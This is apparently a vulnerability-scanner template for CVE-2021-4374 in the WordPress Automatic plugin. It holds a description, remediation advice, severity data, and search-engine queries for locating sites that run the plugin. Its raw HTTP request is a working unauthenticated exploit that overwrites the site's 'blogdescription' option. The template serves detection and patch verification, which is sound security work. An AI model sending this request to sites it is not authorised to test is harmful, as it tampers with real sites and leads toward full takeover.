id: CVE-2021-4374

info:
  name: WordPress Automatic Plugin - Unauthenticated Options Change
  author: intelligent-ears
  severity: critical
  description: |
    WordPress Automatic Plugin (versions 3.53.2 and below) contains a critical vulnerability that allows unauthenticated users to change arbitrary WordPress options through the process_form.php script. The vulnerable script uses update_option() on all POST parameters without authentication or capability checks, allowing attackers to create administrator accounts or modify critical settings. The vulnerability can be exploited even if the plugin is deactivated as it's a standalone script.
  impact: |
    Unauthenticated attackers can update arbitrary WordPress options via process_form.php, enabling them to create administrator accounts, modify critical settings, or completely compromise the WordPress site.
  remediation: |
    Upgrade to WordPress Automatic Plugin version 3.53.3 or later, or deactivate and delete the plugin.
  reference:
    - "https://www.wordfence.com/blog/2021/09/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
    - "https://nvd.nist.gov/vuln/detail/CVE-2021-4374"
  classification:
    cve-id: CVE-2021-4374
    epss-score: 0.16408
    epss-percentile: 0.96572
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-862
    cpe: cpe:2.3:a:valvepress:wordpress_automatic_plugin:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: valvepress
    product: wp-automatic
    fofa-query: "wp-content/plugins/wp-automatic/"
    google-query: inurl:"/wp-content/plugins/wp-automatic/"
    shodan-query: 'http.html:"wp-content/plugins/wp-automatic/"'
  tags: cve,cve2021,wp,wordpress,wp-plugin,wp-automatic,unauth,intrusive,vkev

http:
  - raw:
      - |
        POST /wp-content/plugins/wp-automatic/process_form.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        field1={{randstr}}&field3=test&field4=test&field5=test&field6=test&blogdescription={{randstr}}

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{randstr}}'

      - type: status
        status:
          - 200
# digest: 490a004630440220381b19c2e7fe1f5ba2bd70e26d53d7e5bef9f27bde4be8fd26e84dcfb418bb0302203bba3e7ab02bf6b6a45280253e1c223bebe2a0e492af477cb26f5d0ea3efb8a3:922c64590222798bb761d5b6d8e72950